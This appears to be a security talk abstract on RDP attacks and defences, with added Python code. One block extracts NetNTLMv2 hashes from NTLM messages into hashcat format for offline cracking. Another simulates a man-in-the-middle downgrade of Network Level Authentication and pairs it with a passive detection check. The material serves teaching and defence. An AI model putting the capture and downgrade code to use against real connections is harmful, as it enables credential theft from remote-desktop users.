Remote Desktop Protocol (RDP) is the de facto standard for remote access in Windows environments, and its use grew over the last couple of years as the pandemic pushed many workers to do their jobs on remote systems. RDP can be deployed securely. Unfortunately, we have found that it rarely is, and users commonly click through the security warnings that would otherwise give an attack away.
GoSecure Titan Labs has spent three years working on and reimplementing parts of RDP in PyRDP, our open-source RDP library. This presentation shares what we have learned and how it can be applied to attack and defend against RDP threats.
From an attacker’s perspective, we will cover:
- Conventional RDP attacks such as Monster-in-the-Middle (MITM) attacks on RDP connections
- Capture of NetNTLMv2 hashes
- Techniques to bypass conventional defense mechanisms such as Network Level Authentication (NLA)
Did you know that, as of today, all RDP clients by default accept a server-side NLA downgrade, proceeding without NLA whenever the server side does not select it? Walking through these attacks will let us understand and identify the risks of RDP.
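To make the NetNTLMv2 capture concrete, here is an added example, not code from PyRDP or from this talk, that extracts the crackable material from an NTLM CHALLENGE_MESSAGE and AUTHENTICATE_MESSAGE pair, the two messages a MITM sees inside CredSSP when a client authenticates with NTLM during NLA, and emits the line format hashcat mode 5600 (john's netntlmv2) expects. The sample messages are constructed by the block's own builders (domain CORP, user alice, placeholder challenge, NTProofStr and blob values), the CredSSP/SPNEGO layers that wrap these messages in a real capture are assumed to have been stripped already, and the message layouts follow MS-NLMP.

```python
"""NetNTLMv2 capture: pull the crackable pieces out of an NTLM CHALLENGE_MESSAGE and
AUTHENTICATE_MESSAGE (MS-NLMP 2.2.1.2 / 2.2.1.3) and format them for hashcat -m 5600."""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001


def _message_type(msg: bytes) -> int:
    if msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("missing NTLMSSP signature")
    return struct.unpack("<I", msg[8:12])[0]


def _field(msg: bytes, descriptor_offset: int) -> bytes:
    """Resolve a (Len, MaxLen, BufferOffset) descriptor to the bytes it points at."""
    length, _maxlen, start = struct.unpack("<HHI", msg[descriptor_offset:descriptor_offset + 8])
    return msg[start:start + length]


def parse_challenge(msg: bytes) -> bytes:
    """ServerChallenge (8 bytes) from a CHALLENGE_MESSAGE, type 2."""
    if _message_type(msg) != 2:
        raise ValueError("not a CHALLENGE_MESSAGE")
    return msg[24:32]


def parse_authenticate(msg: bytes):
    """(domain, user, NTProofStr, blob) from an AUTHENTICATE_MESSAGE, type 3."""
    if _message_type(msg) != 3:
        raise ValueError("not an AUTHENTICATE_MESSAGE")
    # Descriptor offsets: LmChallengeResponse 12, NtChallengeResponse 20, DomainName 28,
    # UserName 36, Workstation 44, EncryptedRandomSessionKey 52; NegotiateFlags at 60.
    nt_response = _field(msg, 20)
    flags = struct.unpack("<I", msg[60:64])[0]
    encoding = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"  # OEM approximated
    domain, user = _field(msg, 28).decode(encoding), _field(msg, 36).decode(encoding)
    if len(nt_response) <= 24:   # an NTLMv1 NT response is exactly 24 bytes, v2 is 16 + blob
        raise ValueError("NT response is NTLMv1 or empty, not NetNTLMv2")
    return domain, user, nt_response[:16], nt_response[16:]


def to_hashcat(challenge_msg: bytes, authenticate_msg: bytes) -> str:
    """USER::DOMAIN:ServerChallenge:NTProofStr:blob, lowercase hex (hashcat 5600, john netntlmv2)."""
    server_challenge = parse_challenge(challenge_msg)
    domain, user, nt_proof, blob = parse_authenticate(authenticate_msg)
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(), nt_proof.hex(), blob.hex())


# Builders for constructed sample messages: minimal layouts only. Real messages also carry
# Version, TargetInfo and MIC fields, which the absolute BufferOffsets let the parsers ignore.
def build_challenge(server_challenge: bytes) -> bytes:
    empty = struct.pack("<HHI", 0, 0, 48)   # empty TargetName / TargetInfo, pointing past the header
    return (NTLMSSP_SIGNATURE + struct.pack("<I", 2) + empty
            + struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE) + server_challenge + b"\x00" * 8 + empty)


def build_authenticate(domain: str, user: str, nt_proof: bytes, blob: bytes) -> bytes:
    header_len = 64   # signature 8 + type 4 + six descriptors 48 + flags 4
    payload, descriptors = b"", b""
    for data in (b"", nt_proof + blob, domain.encode("utf-16-le"), user.encode("utf-16-le"), b"", b""):
        descriptors += struct.pack("<HHI", len(data), len(data), header_len + len(payload))
        payload += data
    return (NTLMSSP_SIGNATURE + struct.pack("<I", 3) + descriptors
            + struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE) + payload)


if __name__ == "__main__":
    # Constructed values, not a real capture: challenge, NTProofStr and blob are placeholders.
    challenge = build_challenge(bytes.fromhex("0102030405060708"))
    authenticate = build_authenticate("CORP", "alice",
                                      bytes.fromhex("000102030405060708090a0b0c0d0e0f"),
                                      bytes.fromhex("0101000000000000") + b"\xaa" * 8)
    print(to_hashcat(challenge, authenticate))
```

The NTProofStr is HMAC-MD5 over the server challenge and the blob keyed with the user's NTLMv2 hash, so the captured line is enough for an offline dictionary attack; the MITM never has to break the TLS layer, it only has to be the endpoint the client talks CredSSP to.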
From a Blue Team / defender perspective, we will provide:
- Techniques and tools to detect these attacks
- Step-by-step instructions to deploy an accessible RDP server that is both secure and functional
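As an added illustration of both the NLA downgrade mentioned above and the kind of wire-level check a defender can run (example code, not PyRDP's or the talk's own), the block below builds the X.224 Connection Request and Connection Confirm that carry RDP protocol negotiation, shows a MITM answering with TLS-only when the client asked for NLA, contrasts a default client that accepts with one that insists on PROTOCOL_HYBRID, and flags the downgrade passively from the two PDUs. Layouts follow MS-RDPBCGR 2.2.1.1 and 2.2.1.2; the honest_server_reply selection logic and the require_nla client switch are simplifications assumed for illustration (a real server that requires NLA answers a non-NLA client with an RDP Negotiation Failure rather than falling back), and the cookie value is constructed.

```python
"""X.224 connection negotiation (MS-RDPBCGR 2.2.1.1 / 2.2.1.2): where NLA is selected
or negotiated away, what a downgrading MITM answers, and a passive wire check."""
import struct

# requestedProtocols / selectedProtocol flags
PROTOCOL_RDP = 0x00000000     # standard RDP security only: no TLS, no NLA
PROTOCOL_SSL = 0x00000001     # TLS, credentials typed into the Windows logon screen
PROTOCOL_HYBRID = 0x00000002  # TLS + CredSSP, i.e. Network Level Authentication

TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03


def _tpkt(tpdu: bytes) -> bytes:
    """Wrap an X.224 TPDU in a TPKT header: version 3, reserved, big-endian total length."""
    return struct.pack(">BBH", 3, 0, 4 + len(tpdu)) + tpdu


def build_connection_request(requested: int, cookie: bytes = b"") -> bytes:
    """Client -> server: X.224 Connection Request carrying an RDP Negotiation Request."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested)
    variable = cookie + neg_req
    # LI counts every byte after itself: CR code, DST-REF, SRC-REF, class option, variable part
    return _tpkt(struct.pack(">BBHHB", 6 + len(variable), 0xE0, 0, 0, 0) + variable)


def build_connection_confirm(selected: int) -> bytes:
    """Server -> client: X.224 Connection Confirm carrying an RDP Negotiation Response."""
    neg_rsp = struct.pack("<BBHI", TYPE_RDP_NEG_RSP, 0, 8, selected)
    return _tpkt(struct.pack(">BBHHB", 6 + len(neg_rsp), 0xD0, 0, 0, 0) + neg_rsp)


def _x224_variable_part(pdu: bytes, expected_code: int) -> bytes:
    version, _reserved, length = struct.unpack(">BBH", pdu[:4])
    if version != 3 or length != len(pdu):
        raise ValueError("bad TPKT header")
    li, code = pdu[4], pdu[5]
    if code != expected_code:
        raise ValueError("unexpected X.224 TPDU code 0x%02x" % code)
    return pdu[11:5 + li]   # skip LI, code, DST-REF, SRC-REF and class option


def parse_connection_request(pdu: bytes) -> int:
    """Protocols the client offered (PROTOCOL_RDP when the rdpNegReq is absent)."""
    variable = _x224_variable_part(pdu, 0xE0)
    if len(variable) >= 8 and variable[-8] == TYPE_RDP_NEG_REQ:
        return struct.unpack("<BBHI", variable[-8:])[3]
    return PROTOCOL_RDP


def parse_connection_confirm(pdu: bytes) -> int:
    """Protocol the server selected; raises on an RDP Negotiation Failure."""
    variable = _x224_variable_part(pdu, 0xD0)
    if len(variable) < 8:
        return PROTOCOL_RDP   # legacy server, no rdpNegRsp
    ntype, _flags, _length, value = struct.unpack("<BBHI", variable[:8])
    if ntype == TYPE_RDP_NEG_FAILURE:
        raise ValueError("server refused negotiation, failureCode=%d" % value)
    return value


def honest_server_reply(request: bytes, server_supports: int) -> bytes:
    """Simplified server: pick the strongest protocol both sides support."""
    common = parse_connection_request(request) & server_supports
    for proto in (PROTOCOL_HYBRID, PROTOCOL_SSL):
        if common & proto:
            return build_connection_confirm(proto)
    return build_connection_confirm(PROTOCOL_RDP)


def mitm_downgrade_reply(request: bytes) -> bytes:
    """Client-facing answer of an NLA-downgrading MITM: ignore the HYBRID bit and select
    TLS-only, so the user types credentials into a logon screen the MITM sits in front of."""
    parse_connection_request(request)   # the request is still checked to be well-formed
    return build_connection_confirm(PROTOCOL_SSL)


def client_accepts(request: bytes, confirm: bytes, require_nla: bool) -> bool:
    """Default behaviour: accept any selected protocol that was offered.
    A client that insists on NLA accepts nothing but PROTOCOL_HYBRID."""
    requested = parse_connection_request(request)
    selected = parse_connection_confirm(confirm)
    if selected and not (selected & requested):
        return False
    return bool(selected & PROTOCOL_HYBRID) if require_nla else True


def nla_negotiated_away(request: bytes, confirm: bytes) -> bool:
    """Passive check over a captured request/confirm pair: NLA was offered but not selected."""
    requested = parse_connection_request(request)
    selected = parse_connection_confirm(confirm)
    return bool(requested & PROTOCOL_HYBRID) and not (selected & PROTOCOL_HYBRID)


if __name__ == "__main__":
    # Constructed exchange: a modern client offers TLS and NLA; the cookie value is made up.
    req = build_connection_request(PROTOCOL_SSL | PROTOCOL_HYBRID, b"Cookie: mstshash=alice\r\n")
    good = honest_server_reply(req, PROTOCOL_SSL | PROTOCOL_HYBRID)
    bad = mitm_downgrade_reply(req)
    print("honest server selected:", parse_connection_confirm(good))
    print("MITM selected:", parse_connection_confirm(bad))
    print("default client accepts the downgrade:", client_accepts(req, bad, require_nla=False))
    print("NLA-only client accepts the downgrade:", client_accepts(req, bad, require_nla=True))
    print("downgrade visible on the wire:", nla_negotiated_away(req, bad))
```

The passive check fires for a server that simply does not require NLA just as it does for a MITM, which is the property a defender wants: either way credentials will be typed into a logon screen rather than proven through CredSSP before the session starts. On the client side, the only thing that closes the hole in this model is refusing to continue without PROTOCOL_HYBRID, which is what client_accepts does with require_nla=True and what default clients do not do.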